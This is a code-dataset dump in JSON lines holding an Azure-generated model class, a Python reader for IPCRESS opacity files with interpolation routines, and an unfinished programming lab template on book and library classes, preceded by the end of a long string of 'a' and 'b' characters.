aaaabaaababbabbabaabababbababaaabbaaaaaabbbabaaaabaabaaaabbabbaaaaaaabbbbbbabaaabababababbbabababaabaabaaaababaaaaaaababaaababbbbbbbabbbaaabaaabbabababbbbbaababaababbabaaabaababaaababaabababbbbaabaabbbbbbbabbaaabbaaababaaaabbbbabbaabbbbabaabbaabbbabaabbababaaabbabaaaabaaababbbbabbabbabababaaaaabbbbaaabaaabaabbbbbaabbbbaaaabbabbbabbbbaaaabbbabababaababbbbababaaabbbaaabaabbbbababababababbaaababbbbaaaaaaabbbbaaabbbbbbaaaabbaabbbbbaaaaaabbbbaabbaaabaaaaabbbbbbbbabababbaababbbbaaababaaabaaabbaababababaaabbbaabbbaaaabaaabbbaaaabbaababaaaabbbaaaaaaaaababbbabaababbbaabbabbabaaaaaababbbbbbaaabbbababaabababaabbbabaabaaaaabbbbaababbabbabaabbababaaabbabbbbaabbaaabbaaababaaabaaabbaaaaabbbbbaaabbabbbbabbbaaaaaaaabbbaababaaaabaaaaaabbbaababababababbbbaaabaabaabbaabbabaaabaabbbaabaaabbbbbbbbbbbaaaabbbbbbbbbbbbaabaaababaabababaabbbaaaabaaaaabbabbbaaabbbbbaaabaabaaabaabbaababababbabababaaaaaabbbabbaabaabbaaabaabbbababababbbbbbaabbbbaaabaababbaaabbbbbaababaabaaabbbbbabbabaabaabaabaabbabaabbaabbaaabbbbabbbbbabbabbbbbbaaaababbaababbbbabaaabaabaaabbbabbaaabbaaaababbbaabbaabaaaaabababbabbabbabaabbabbabbabbbbaaaaabbbababbbbaabbaaaabaaaaaabbbabaaabaaaabbbbaabbbaaababbabbbabbabababbbaaaaabbbbbaaabaabbaababbababaabaaabbaaaabbaaabbaaabbaabbbbbbababbabbbbbbbaabbbabbbabbbbbbbbbabbabbbabbbbbbbbbabbbbbaaabaabaaabbaabbabbbbbbbabbaaabbabaaabbbbbbbbbbbbbbabbaabbbaaaababaaaaaaabaabbbbabbbbbbbbbbaabababababbbbabbbbabbaaabaabbaaaaabbaaababbbaaaaaabbaaababbababaababbbabababbabbbabaaaaaaabaaabbbabababaabbabaaaabbbbbbaaaababaabbbbaabbaaaaaabaaabbaaaabaaaaabaaaabbbabababbabaaababbbaaaabbaaaabbababbaabaabbaababbababbababbbabaababbbaaaabbbbaabbbabbabaaaaaaaaaaaabababaaaabaaaaababbbbabbbbabaabaabbbbbbabbbaabaabbbabaaaaabbabbaabbbaaaabbbbaaaabbabbaabbaabaaabbbbbabbaababbaabaabababaaabbabbaabaaaaaaababbaabaaaabbaabbabbbaaaababaaaababbaabbbaaaabbbaaabaaabbbbbbabaabbbaaababababbbbbbabbabbbaaaaababbbaabaaaabababbbaaaabaaaabbabaaaaaababaabaabaaabaabaabbaaaaaabaaaababbbbbbbabbababaabaababaaaabbaabaabbaabbaaaaaabaababbaaaaaaababbbbabaabbbbaaabbbaabbbbaababbbaabaaababbbabababaabaaabbabbabbbabababbabbbaabaaaaaabaabaaaaaaaabbaaaabaaaabaabbaababbabaaabababbbaaaaaaaababaabaabaaabaaaabaaaaaabbbbbaaaaaababbabbbabbbaabbbaaaaababaabbbbaaababbaabaababaababaaabababaaaaabbbababbbbabbbabbabababbbbbababbaabbbbabbaabbbbabaababbabbbabbbbbbbaabababbbbabbbbaaababbbbbbbbaaaababaabaabbaabbabaabaaabaababaabbbabbbaaaabababbbaaabababbababbaababbbabaababaaabbbaaabbbbabbbabbaaababababbaaaaaababbaaabbbaabbabaabaaaabbabbbabbaaabbbaaabbbbbabbaabaabaabbbaaabaabbbbbaababbbbabbbbabaaaaabaabbbbbabbaababaabbbbbbbbbabaaaaabaabaabababbbababbabbbaabaaabaaabababaaababaaaabbbbbabbbbabbbababbabbabbaaaabbbbaababaabbaaaaababbbbabbbaabaabaabaababbbaaabaaabbbbbbbaabbabbbbbbbabbbbbbaaababaabbbabbbbababbaaabaabaaabbababbbbabbababbabbaababbbbbbbbaabaabbbbaababbaaaaababaaaaababababaabbbaabaabbabaaabaaaabaaaaabababababbababababbbbbbbaaabbbbbbbbaaaaabaaaaaaabbbbaaaabbbababaaababbababbbabababbababaabbaaababbbabbbbabbaaaaabaabaababaaaabbbabbbbabaaaaaaabbbaabbabbbbbbaabbaabaabbaabbaaaabbabbaabbbabbaaaaaaaaabbbbaaababbbaaaabbaabaaaabbabbabbbaabbbbbabababaaabbabaabbaabbbbaaaaaaaaababababbbabbaaabaabababababbbaabaaabaaaabaaabaaaabbbbbbbbbababaaaababbbbbababaaabbbabbbabbaabaaabaabbbbabbbbbbaaaabbaaaaababbaabaaaaaababbbbbabbaaaaabbbabbaababaaaaaabbababbabbbbaabbbbbbabaaaabababbaaabbbababababaabaaaaaababaaaababaaabaaabaaaaababaaabbabbbaabbabaabbabbbababbababbaaababbbbbaabbbabababbabbabbaabbaabaaaabbaaaabbaabaabbbbbabbababaaaabaabbabaabbaaaababbaaabbbbbbbababababbabbabbbbbababbbbbbaabbaabaabbababbbbabaaabbbaabbabbaabaabababbababababbaaaaaaaaaabbabaabaabbaabaaabbbaaaabbbbbaaabbaabaaababaabbabaaaababbabbaababaaabaaabbbabaabaabbbabbabaaaaabbaabaaaaabbaabbaababababbaabaaaaaabaaabbabaaaabbbabaabbabbaabbbaaabbbaaaababaaabbabbabaaaabaaabbaabbbaaaaabbababaabbbbaaabbbbbbaabbabbbbbabababbabbaaabaabbabbbabaaaaaaaaabababbabbabaaaaaabbaaaabbbbaaabbbbaaabbabaaababbaaabbaaabbbbaaabbbbbbbabaaabbbbaaababbaabaabbbbbabaababbaaaababaababababbaabbbaabbbabbbabababbabbabbbaababbaaaabbabbababbbbaabaaaaaabababbbbababaaabbbbbbbbbabbbbbbaaaabbaabbbbbaabbabaaabababaaabbbbbababbbabaaaaabbaaabaaabbbaababbbbaabababbabbbababaaababbbaaaabaabababbbaabaaaabaabababbaabbbaaabababbbabaabbbabbaabaaabbaabbababbbbababbaaaabaaaaabababaaaabbbabbbbaaabbaaabaaaaabaabbbbbbaaaaabbaaaaaabbbbbbbbaaaaaaabaabbbaababbbbabaaababbabababbbbaabababbbababbaabbbabbaaaabbabaabaabbbbbbabbbabababbbaaaaabbaaaabbabbbaaababbababaabababaabaabaabaaabaaabbaaaabbaaaaaababbabbababababbaababaaababbabbbabaabbbbabbaabaabababbbbabaabaaaabbaaaaaaaaabbbabbbbabbbabbabaaabbbabababbbabbbbbaabbabbabbbaababbaaaaaabaabbabaabaaaabbbababbbbaaaaaababaabaaaabbababbaaaaabbbaaaaaaabababbaaabaaabaababaaaababbaaabbbabaaaabbbbabbababbabbbababbbbaaaaaaabbbabbabaaaaababbaababaaabbaababbabbbaabbababbbabbaabbbbbabaaabaabbabbbaabbbbbabababaaaaabaabbabababbbbaababaaababaababbbbbabababbabaababaabaabbbabaabbbaabbabbbabbababaaaaabbbaaaabbbbabaaabaabaabbbaababbabbbbaaaabbbaaaabaaabbaabbbbbabbbababbbaaaabababaaaababbbbbaabaaaabbbaabbaaabbaabaaaabbbbbaababaabbababaaabbabaaaababbaabaabaaabaabbbaababbbbabbbaabaaaaabbabababaabaaaabbbababbbbabbbbaaaaaaabaaabaabbbbaaaaababbaaabbbbabbbbbabbaaabaaabaabaabaaabbaabbbaabbabaaaabbbaaaabbabaaaaaaaabbbabbbaaaaabbabaaaaabbabbaaabbbabbaabaaaabbaaabbabbbbaaabaabbbbbbbabababababbaaabaabaaabaaabbaaabbaabbabaaabaabbaabbabbbbbbbbaaababbbbabbababbababbbbabbabaabaaaaaaabbbabababbaabbaaabaabbaabbabaaaabaabbaaabaabbbababaaabbbabbabbababbaabbaaababbabaabaabbaababaabaabbaabbbbaaabaaabbabbaaaababababaaaabaababbbbbaabbabbaababbaabbbbaabababbabaabaaaaaaabbaabbabbaaabbbbbababbbbbbaaababaabbbabbababbaaaaaaabbaabbbbabbbbbaabaababbaabbbbbaaaabababbbbaaaaabbababbababababaababbbbbabbabaaaaabbbbabaabbaabbbabbbbbaaaaabbbaaabbbabbabbbababaaaabbaababababaabababbaabbaabaaaabbbabbbababababbbaabbabbbaababbbaaabababaaaabaababaaaababaabaaaaaaaabababbabaaaabaaabbbbbabaaabaababbbbaaaababaabaaaaababbaaabaabbaaaaababaabaabbabbabbbaababababbbaaababaaaaaabbbbaaaabbabbbbabababaabbaaabbbbaabbaabaaabbbbbaaabbabaababaaabbbaaaabbaaabbbabbbbaabbbabaaabbbabbbababaaabbbbaaabbabbbbbabbaaababbbbbbababbabbbbaaaabaaabbaabbaaabbabbaaaaabaabbabababbbabbabaaabbbaabaaabaaaaabababbbbaaaabbbbabbbaabbababbaababababbbaaababbabaaabababbababbabbabaabaabbbbaaabaabaaabababbabababababbbbaaaaabababbabababaabaaaaaabbbbaabbbaabaabaaaaaaabbaaabbababbaabaabbbaabbaabbbaabaaabbbbaaaababbbbbbbbabbaabababbbaaababbabababbbbbaaabbabbaabbbbaabbabaaaabaaababaabbbaaaabbabbbbbaabbbbbbaaaababbaaabbaabaaabbaabaaababbbaaabbbaaaabbabbaaaaaabaabaabbbabaaaaabbbaaabbbbbbbbbbbaabbbbbbabbaaababbbaaaabbabbaabbaaababaabaaabaabbaaabbbbbaaaaabbbbbbbaababbbbabbbaaabbabaaaabbabbaaaabaaabbaaababbbabbaaaababbbbabbabbabaabbbabbababaaaaabbaabbababaaabababbaaaaaabbbbaaaaabbababbababbbabababbabbbbaabbabbbbbabaabbaabbbabbababbbbababaabbbaabaaabaaaaabbabababaaaaaabaabbbaaabaababababbabbaaabaaabaabbbbabaaaaababaababababbababababbaaaababbabbabbbbbaabbababbbbbaaababbbababbaabbbaaabbbbabbbbbabbbaabbaaabbaabbaababbabaabbababbbbbbabaaabaabbbbabbbbabaaabbaabaabbabbaaaaaaaaaabbbbbbbbabbbaabbbabbbbbbbaababaababbaaaaaababaaabbbbbbaaabbbbbaabaaaababaabaabbbabbabbaaaababaaabaabbaababbbaababbbbaaabababbabbabababaabbbbbbbbbaababbaaaabaaabbbbbaabababbaaaaaaaaabbaabbababbbabbbbbaabaaabbaabbaaabbbaabbaaaababaabbbaabaabbaabbbaabbabbabbaaabaababbbaababaaaabbbaabbbbbabaaabbbbbbaaaaaabbaabbbbbbbbabbbbbbbaaaabbbabaaabbbbabbbbbbabbababaabaaabaabbabaabbababababbaaabbbbbaaabbabaabbabbaaaababbaabaaaaabbbbbbabaaabaaaaaaabbbbabaaaabbbababaabbbabbbbaaaababaababaaabbabbaaaabbabbabbabaaabaabbaaabbbababbabbbababbaabbaaabbaabbbbaaabbbabbbbaaaaabbaaabbabbaaaaaaaababbababbabaababbaaaabbbbaabaababbbbbbbbabbbbabbabaaababbbbaaaaababaaaabaaaabaabbaaaaaabbaabbaabbbbbabaaababbabbbaaabbababaaaaababbabbbbabaaaaabaababababaabbabbaabaaaabaabbbabbababbabbbabababaabbbbabbbbaabaaabaabbbabbaabaaababbbaabaabbabbbbabaaaabbbabbbabbaabbbabbaaababbabaaaabaaaaaabbbabaabababaabaabaabaabbbaaaabaabbaabaabbbbaababaabbbbbabbaabaaabaabbbbabbbbabbaaabbaaabbaaabaaaaaaaabaabaaaabaaababbababbbbaaababbbbababbbaaaabbbbaabbababbbabbaaabbaaaabbbbabbaabaaabbaababaabbaaaabaaaabbaaaaabaababbbabbababbbbababbbbaaabbbbabababbbbabbbbaaaaabbbaabbbaabaaaabaabbabbbaabaababbbbaaabbbbbbaababbbbbaaaaaababbabbbbabababbbabbbabbbaabaabbbbbabbabbbbbaabbbabaaabababaaaaaaabaabababbaaabbaabbbababaaabbaababaaaabbbbaabbbbaaabbbabaaaaaaaabaaabaaabababbaaaaaabaaabbbbbabbabbaabababbababababaaaababbabbaabbabbabaaaabaaabaabbbabaabbbbbaabaababaaabababaabbbabbbbbbbbbbaaababbbbbbababaaaabbaabbbbaabbbababababbbaaaaabbabaaaaabbaaaabababbabaabbabbababbbbbabaaabbbbbbbbbaaabaaababaaaaabaabbaaaabbaabbbbbabbaabaabbaaaababaabbbbbabbbaaabaabbabbaaaabaaaabaaaaaaaabaabbabbbaabbababbbabaaabaabaaabbaababbbababbaabaaaabbabbbbbaaababbaabbaababbaabbbbbbababbabbaabababbbabbbbbbabbbabababbbbabbbaaababbaaabbbaabaaaabaaaabaabbbababbbbbbbbaaababbaabaaabbaaabbbbbabbbabbbababaabaaaaaaaaaabbbbbaabbbabbbbbabbabaabbabbbaabbbbabbabbbaaabbaababbabababaabbbbbaabbbbaabbbabbaaaaaabaabbabbbbbaaababbabbbababbbbbaaabaabbaaaaaabaaaaaabbbaabbaaabaababbaaabbabaabbbaababbaabbbbbbabbbbabaababbbbbaababbabaabbbaaaaabbbbbababbaabbababaabbabbbabbaaaaaabaaabbababbaabbbabbbabbabaabbaaabbaabbbbabbbaaaaaaaaabaabbbbababaababbbbababbbaaabbabbaabbababbaabababaabbaaabaabbababbbaababababbbababaababaaaabbaabbbaabaabbabbaaaaaaaaabbbbbabbbabaaaabbabaaababbaabaababaaabbaabbabbbabbaaabaaabbbbaaabbbabbabababbbbbbbbbaaabaabbaababbabaaaababbbbbababbabaabbabababaaaaababbabaaabbaaabbbbbaabbabbababbaaabbbaabbabaabaababbaaabbbbbaabbaaaaabbaabbbaabbbbabbabbabaaabbbabaaaaaaaababaaaababaaaaababaaaabaaaaaaaaababaabbbababbbbaabaaaaabbbababbabbaabbaaabb\""} {"ext": "py", "sha": "1a30a6aef98eaac5be09a134db30813a4870b88f", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass EnvironmentDeploymentPropertiesFragment(Model):\n \"\"\"Properties of an environment deployment.\n\n :param arm_template_id: The Azure Resource Manager template's identifier.\n :type arm_template_id: str\n :param parameters: The parameters of the Azure Resource Manager template.\n :type parameters:\n list[~azure.mgmt.devtestlabs.models.ArmTemplateParameterPropertiesFragment]\n \"\"\"\n\n _attribute_map = {\n 'arm_template_id': {'key': 'armTemplateId', 'type': 'str'},\n 'parameters': {'key': 'parameters', 'type': '[ArmTemplateParameterPropertiesFragment]'},\n }\n\n def __init__(self, *, arm_template_id: str=None, parameters=None, **kwargs) -> None:\n super(EnvironmentDeploymentPropertiesFragment, self).__init__(**kwargs)\n self.arm_template_id = arm_template_id\n self.parameters = parameters\n"} {"ext": "py", "sha": "1a30a795d92cf0185b07147a9bfe07ccaec7b3a0", "content": "#!/usr/bin/env python\n#-----------------------------*-python-*----------------------------------------#\n# file src/cdi_ipcress/python/ipcress_reader.py\n# author Alex Long \n# date Monday, December 15, 2014, 5:44 pm\n# brief This script has fucntions that parse an IPCRESS file and returns a\n# dictionary that contains data for each property and each material\n# present in the file. This script also contains interpolation functions\n# for opacity data.\n# note Copyright (C) 2016, Triad National Security, LLC.\n# All rights reserved.\n#--------------------------------------------------------------------------------------------------#\n\n# import block\n################################################################################\nimport re\nfrom numpy import arange, sin, pi, min, max\nimport sys\nimport struct\nimport numpy as np\nfrom struct import *\nfrom math import *\n################################################################################\n\n# These are the functions that are used to read data from the\n# binary IPCRESS file. It also contains a function for interpolating in\n# density and temperature. The data locations are specified in\n# cdi_ipcress/doc/IPCRESS_File_Format.pdf\n\n################################################################################\ndef get_data_for_id(filename, data_start_index, num_entries):\n temp_grid = []\n # \"rb\" is read binary mode\n with open(filename, \"rb\") as f:\n f.seek(data_start_index*8)\n for i in range(num_entries):\n word = f.read(8)\n temp_grid.append(unpack('>d', word)[0])\n return temp_grid\n################################################################################\n\n\n################################################################################\ndef write_data_for_id(filename, data_start_index, num_entries, new_values):\n # \"wb\" is write binary mode\n with open(filename, \"r+b\") as f:\n f.seek(data_start_index*8)\n for i in range(num_entries):\n s = struct.pack('>d', new_values[i])\n f.write(s)\n################################################################################\n\n################################################################################\ndef interpolate_mg_opacity_data(T_grid, rho_grid, hnu_grid, op_data, \\\n target_rho, target_T, print_str=\"\"):\n n_rho = len(rho_grid)\n n_T = len(T_grid)\n n_hnu = len(hnu_grid)\n\n # don't allow extrapolation\n if (target_rho < np.min(rho_grid)): target_rho = np.min(rho_grid)\n if (target_rho > np.max(rho_grid)): target_rho = np.max(rho_grid)\n if (target_T < np.min(T_grid)): target_T = np.min(T_grid)\n if (target_T > np.max(T_grid)): target_T = np.max(T_grid)\n if (print_str is not None):\n print( \\\n \"Interpolating {0}--Target rho: {1} , target T: {2}\".format( \\\n print_str, target_rho, target_T))\n\n # get correct index of adjacent density points\n rho_L = 1000; rho_G =0\n for rho_i, rho in enumerate(rho_grid[:-1]):\n if ( target_rho >= rho and target_rho<=rho_grid[rho_i+1]):\n rho_L = rho_i\n rho_G = rho_i+1\n break\n\n # get correct index of adjacent temperature points\n T_L = 1000; T_G = 0\n for T_i, T in enumerate(T_grid[:-1]):\n if ( target_T >= T and target_T<=T_grid[T_i+1]):\n T_L = T_i\n T_G = T_i+1\n break\n\n #print(\"Temperature interpolation bounds: {0} {1}\".format(T_grid[T_L], T_grid[T_G]))\n #print(\"Density interpolation bounds: {0} {1}\".format(rho_grid[rho_L], rho_grid[rho_G]))\n\n #get the adjacent rows of the opacity index\n #get the points of the opacity index\n rho_L_T_L = op_data[n_rho*T_L*(n_hnu-1) + rho_L*(n_hnu-1) : n_rho*T_L*(n_hnu-1) + rho_L*(n_hnu-1) + (n_hnu-1) ]\n rho_L_T_G = op_data[n_rho*T_G*(n_hnu-1) + rho_L*(n_hnu-1) : n_rho*T_G*(n_hnu-1) + rho_L*(n_hnu-1) + (n_hnu-1) ]\n rho_G_T_L = op_data[n_rho*T_L*(n_hnu-1) + rho_G*(n_hnu-1) : n_rho*T_L*(n_hnu-1) + rho_G*(n_hnu-1) + (n_hnu-1) ]\n rho_G_T_G = op_data[n_rho*T_G*(n_hnu-1) + rho_G*(n_hnu-1) : n_rho*T_G*(n_hnu-1) + rho_G*(n_hnu-1) + (n_hnu-1) ]\n\n interp_op = []\n #interpolate for each frequency point\n for i in range(n_hnu-1):\n #if (rho_L_T_L[i] < 1.0e-10) or (rho_L_T_G[i] < 1.0e-10) or (rho_G_T_L[i] < 1.0e-10) or (rho_G_T_G[i] < 1.0e10):\n # interp_op.append(1.0e-10)\n #print(\"{0} {1} {2} {3}\" .format(rho_L_T_L[i], rho_L_T_G[i], rho_G_T_L[i], rho_G_T_G[i]))\n log_op_T_L = log(rho_L_T_L[i]) + log(target_rho/rho_grid[rho_L]) / log(rho_grid[rho_G]/rho_grid[rho_L]) * log(rho_G_T_L[i]/rho_L_T_L[i])\n log_op_T_G = log(rho_L_T_G[i]) + log(target_rho/rho_grid[rho_L]) / log(rho_grid[rho_G]/rho_grid[rho_L]) * log(rho_G_T_G[i]/rho_L_T_G[i])\n log_op = log_op_T_L + log(target_T/T_grid[T_L]) / log(T_grid[T_G]/T_grid[T_L]) * (log_op_T_G - log_op_T_L)\n interp_op.append(exp(log_op))\n\n print(\"hnu(keV) opacity(sq_cm/g) opacity(1/cm)\")\n for i, hnu in enumerate(hnu_grid[:-1]):\n print(\"{0} {1} {2}\".format( 0.5*(hnu + hnu_grid[i+1]), interp_op[i], interp_op[i]*target_rho))\n return interp_op\n###############################################################################\n\n################################################################################\ndef interpolate_gray_opacity_data(T_grid, rho_grid, op_data, target_rho, \\\n target_T, print_str = \"\"):\n n_rho = len(rho_grid)\n n_T = len(T_grid)\n\n # don't allow extrapolation\n if (target_rho < np.min(rho_grid)): target_rho = np.min(rho_grid)\n if (target_rho > np.max(rho_grid)): target_rho = np.max(rho_grid)\n if (target_T < np.min(T_grid)): target_T = np.min(T_grid)\n if (target_T > np.max(T_grid)): target_T = np.max(T_grid)\n if (print_str is not None):\n print( \\\n \"Interpolating {0}--Target rho: {1} , target T: {2}\".format( \\\n print_str, target_rho, target_T))\n\n rho_L = 1000; rho_G =0\n for rho_i, rho in enumerate(rho_grid[:-1]):\n if ( target_rho >= rho and target_rho<=rho_grid[rho_i+1]):\n rho_L = rho_i\n rho_G = rho_i+1\n break\n\n for T_i, T in enumerate(T_grid[:-1]):\n if ( target_T >= T and target_T<=T_grid[T_i+1]):\n T_L = T_i\n T_G = T_i+1\n break\n\n #get the adjacent rows of the opacity index\n rho_L_T_L = op_data[n_rho*T_L + rho_L]\n rho_L_T_G = op_data[n_rho*T_G + rho_L]\n rho_G_T_L = op_data[n_rho*T_L + rho_G]\n rho_G_T_G = op_data[n_rho*T_G + rho_G]\n\n #interpolate in log space\n #print(\"{0} {1} {2} {3}\" .format(rho_L_T_L, rho_L_T_G, rho_G_T_L, rho_G_T_G))\n log_op_T_L = log(rho_L_T_L) + log(target_rho/rho_grid[rho_L]) / log(rho_grid[rho_G]/rho_grid[rho_L]) * log(rho_G_T_L/rho_L_T_L)\n log_op_T_G = log(rho_L_T_G) + log(target_rho/rho_grid[rho_L]) / \\\n log(rho_grid[rho_G]/rho_grid[rho_L]) * log(rho_G_T_G/rho_L_T_G)\n log_op = log_op_T_L + log(target_T/T_grid[T_L]) / \\\n log(T_grid[T_G]/T_grid[T_L]) * (log_op_T_G - log_op_T_L)\n interp_op = exp(log_op)\n\n #print(\"opacity(sq_cm/g) opacity(1/cm)\")\n #print(\"{0} {1}\".format(interp_op, interp_op*target_rho))\n return interp_op\n###############################################################################\n\n\n\n###############################################################################\ndef read_information_from_file(ipcress_file):\n\n word_array = []\n with open(ipcress_file, \"rb\") as f:\n for i in range(26):\n word = f.read(8)\n if not word:\n break\n word_array.append(word)\n #print(int(unpack('>d', word)[0]))\n\n title = word_array[0]\n toc_int= []\n offset = 2\n for i in range(offset,offset+24):\n toc_int.append( int(unpack('>d', word_array[i])[0]))\n\n n_data_records = toc_int[14]\n mxrec = toc_int[1] - toc_int[0]\n mxkey = toc_int[16]\n #print(\"Number of data records: {0}\".format(n_data_records))\n #print(\"Beginnging of data: {0}\".format(toc_int[0]))\n #print(\"Max records: {0} , max search keys: {1}\".format(mxrec, mxkey))\n\n mat_property = []\n\n ds = []\n dfo = []\n tdf = []\n num_mats = 0\n mat_ids= []\n with open(ipcress_file, \"rb\") as f:\n # Read in array that lists the data sizes in this file\n f.seek(toc_int[0]*8)\n #print(\"Table of data sizes\")\n for i in range(n_data_records):\n word = f.read(8)\n ds.append(int(unpack('>d', word)[0]))\n\n # Read in array gives the offsets between data\n f.seek(toc_int[1]*8)\n #print(\"Table of data file offesets\")\n for i in range(n_data_records):\n word = f.read(8)\n dfo.append(int(unpack('>d', word)[0]))\n\n # Read in material IDs present in this file\n f.seek(dfo[0]*8)\n #print(\"Table of material identifiers\")\n word = f.read(8)\n num_mats = int(unpack('>d', word)[0])\n for i in range(num_mats):\n word = f.read(8)\n mat_ids.append( int(unpack('>d', word)[0]))\n\n # Read in list of properties in this file available for each material\n # entries in this table are 24 bytes each\n f.seek(toc_int[10]*8)\n #print(\"Table of data fields for each material\")\n word = f.read(72) #ignore the first 72 bytes, they don't contain useful information\n for i in range(1,toc_int[14]):\n #oredering is \"matID\" \"data type\" \"fill\"\n temp_property = []\n for j in range(mxkey):\n three_string = []\n three_string.append( f.read(8).decode(\"utf-8\"))\n three_string.append( f.read(8).decode(\"utf-8\"))\n three_string.append( f.read(8).decode(\"utf-8\"))\n if (j==0): temp_property.append(three_string[2].strip() )\n elif (j==1): temp_property.append(three_string[0].strip())\n else: temp_property.append(i) #index of data table containing values\n try:\n temp_property = [temp_property[0].decode('ascii'), \\\n temp_property[1].decode('ascii'), temp_property[2]]\n mat_property.append(temp_property)\n except:\n mat_property.append(temp_property)\n\n materials = []\n for m in range(num_mats):\n materials.append([ m, mat_ids[m]])\n\n #print(\"{0} materials in file\".format(num_mats))\n #for i in range(num_mats):\n # print(\" Matieral ID: {0}\".format(mat_ids[i]))\n\n #print(\"List of available properties\")\n #for i in property:\n # print(i)\n\n #return the list of available properties, data file offsets and data sizes\n return materials, mat_property, dfo, ds\n################################################################################\n\n\n###############################################################################\ndef write_information_to_file(ipcress_file, material_ID, mat_property, new_values):\n materials, property_list, dfo, ds = read_information_from_file(ipcress_file)\n # check to make sure material is in file\n material_IDs = []\n for imat in materials:\n material_IDs.append(str(imat[1]))\n if (not (material_ID in material_IDs)):\n print(\"ERROR: Material ID not found in file, not changing anything!\")\n return\n\n # try to find property in file\n property_found = False\n propery_index = 0\n for prop_i, prop in enumerate(property_list):\n if (material_ID == prop[0] and mat_property == prop[1]):\n property_found = True\n property_index = prop_i\n break\n\n # make sure sizes match of property you're about to write\n if (property_found and ds[property_index+1] != len(new_values)):\n print(\"ERROR: Number of new values does not match size of old values, not changing anything!\")\n return\n\n # if the combination of property and material was found, write the new data to\n # the ipcress file\n if property_found:\n write_data_for_id( ipcress_file, dfo[property_index+1], \\\n ds[property_index+1], new_values)\n else:\n print(\"ERROR: Combination of material ID and property not found, not changing anything!\")\n return\n################################################################################\n\n\n\n################################################################################\n# Checks to see if there are any zeros in the opcaity data--zero data is\n# difficult to handle and for now we are going to ignore data sets that contain\n# zeros and print an error message\ndef check_valid_data(opacity_grid):\n for item in opacity_grid:\n if (item != 0.0):\n return True\n return False\n################################################################################\n\n################################################################################\n# return a dictionary where the keys are \"_\" and the\n# values are the data\ndef get_property_map_from_ipcress_file(ipcress_file):\n #load data from IPCRESS file\n # dfo is the array of data file offsets, ds is the array of data sizes\n materials, property_list, dfo, ds = read_information_from_file(ipcress_file)\n\n #build dictionary of data, keys are \"property_matID\"\n table_key_dict = {}\n for prop_i, prop in enumerate(property_list):\n table_key_dict[\"{0}_{1}\".format(prop[1], prop[0])] = get_data_for_id( ipcress_file, dfo[prop_i+1], ds[prop_i+1])\n\n material_list = []\n for material in materials:\n material_list.append(material[1])\n\n return table_key_dict, material_list\n\n################################################################################\n"} {"ext": "py", "sha": "1a30a820b5fa268f1fe1bc7abb983951f9ee730a", "content": "# START LAB EXERCISE 9\nprint('LAB EXERCISE 09 \\n')\n\n# PROBLEM 1 (4 Points)\n\nclass Book(): \n \"\"\"\n This is a class that contains information on Books.\n\n Attributes:\n title (str): The title of the book.\n author (str): The name of the author.\n\n \"\"\"\n def __init__(self, title, author): \n \"\"\"\n The constructor of the class. Here you will need to create\n the instance variables that were described in the docstring above. \n Note that the attributes are defined by parameters passed to this constructor method.\n \n Parameters:\n title (str): The title of the book.\n author (str): The name of the author.\n\n Returns:\n None\n \"\"\"\n\n pass # Implement\n\n\n def __str__(self):\n \"\"\"\n String method for the class. Whenever an instance of is passed to the \n str() or print() functions, the string from this method will be returned.\n\n Parameters:\n None\n\n Returns:\n str: A string representation of instance in the format \" by <author>\"\n \"\"\"\n pass # Implement\n\n# PROBLEM 2 (4 Points)\n\nclass Library():\n \"\"\"\n This is a class that contains information on a Library.\n\n Attributes:\n books (list): List of book instances in the library.\n torn_pages_tolerance (int): Number of torn pages a book can have and the library will still accept.\n\n \"\"\"\n def __init__(self):\n \"\"\"\n The constructor of the <Library> class. Here you will need to create instance variables\n described in the docstring above. The Library constructor should take NO positional arguments, but\n set instance variables <books> to an empty list and <torn_pages_tolerance> to 3.\n \n Parameters:\n None\n\n Returns:\n None\n \"\"\"\n\n pass # Implement\n\n\n def __str__(self):\n \"\"\"\n String method for the <Library> class.\n\n Parameters:\n None\n\n Returns:\n str: A string representation of <Book> instance in the format:\n \"This library contains <number of books> books\"\n \n \"\"\"\n\n pass # Implement\n\n# PROBLEM 3 (2 Points)\n\n def will_accept(self, book):\n \"\"\"\n Determines if the library will add a book instance to its collection\n depending on its conditions.\n\n if book instance is of Book class, return True.\n if book instance is of PaperbackBook class and the number of torn pages \n is less than or equal to the library's torn page tolerance, return True.\n else return False.\n HINT: there is a built-in isinstance() function to check what class an isntance\n came from\n\n Parameters:\n book: instance of any book class\n\n Returns:\n Boolean (True or False)\n \"\"\"\n\n pass # Implement\n\n# PROBLEM 4 (2 Points)\n\n def add_book(self, book):\n \"\"\"\n This method will modify the <books> attribute by appending the parameter <book>\n to it if the library will accept the book.\n HINT: call will_accept within this method to determine if book can be added\n\n Parameters:\n book: instance of any book class\n\n Returns:\n None\n \"\"\"\n\n pass # Implement\n\n# PROBLEM 5 (2 Points)\n\nclass PaperbackBook(Book): # <- remember to fill in () for class inheritence!\n \"\"\"\n This is a PaperbackBook class that inherits from the Book class. It will inherit\n all attributes and methods from Book. You will overwrite the parent constructor \n to add an additional property but inherit the string method as is.\n\n Attributes:\n title (str): The title of the book.\n author (str): The name of the author.\n num_torn_pages (int): The number of torn pages in the PaperBook.\n \n \"\"\"\n\n def __init__(self, title, author):\n \"\"\"\n The constructor of the <PaperbackBook> class. Here you will need to inherit the attributes \n from the parent class, but add an additional instance variable <num_torn_pages> \n and initialize it to 0. Note that the constructor takes two positional arguments, but will\n set three instance variables.\n \n Parameters:\n title (str): The title of the book.\n author (str): The name of the author.\n\n Returns:\n None\n \"\"\"\n\n pass # Implement\n\n# PROBLEM 6 (2 Points)\n\n def rip_page(self):\n \"\"\"\n This method will modify the <num_torn_pages> and increase it by one every time the\n method is called.\n\n Parameters:\n None\n\n Returns:\n None\n \"\"\"\n pass # Implement\n\n# PROBLEM 7 (4 Points)\n \ndef main():\n\n # 7.1 Create an instance of <Book>\n\n homer_odyssey = None\n\n # print instance of book\n print(homer_odyssey)\n\n # 7.2 Create an instance of <PaperbackBook>\n\n angelou_rise = None\n\n # print instance of PaperbackBook\n print(angelou_rise)\n\n # 7.3 Create an instance of <Library>\n\n lib = None\n\n # 7.4 Add book to the library\n\n pass # Implement\n\n # 7.5 Increase number of torn pages\n\n pass # Implement\n\n # 7.6 Set number of torn pages\n\n torn_pages = None\n\n # 7.7 Try to add Paperbook to the library\n\n pass # 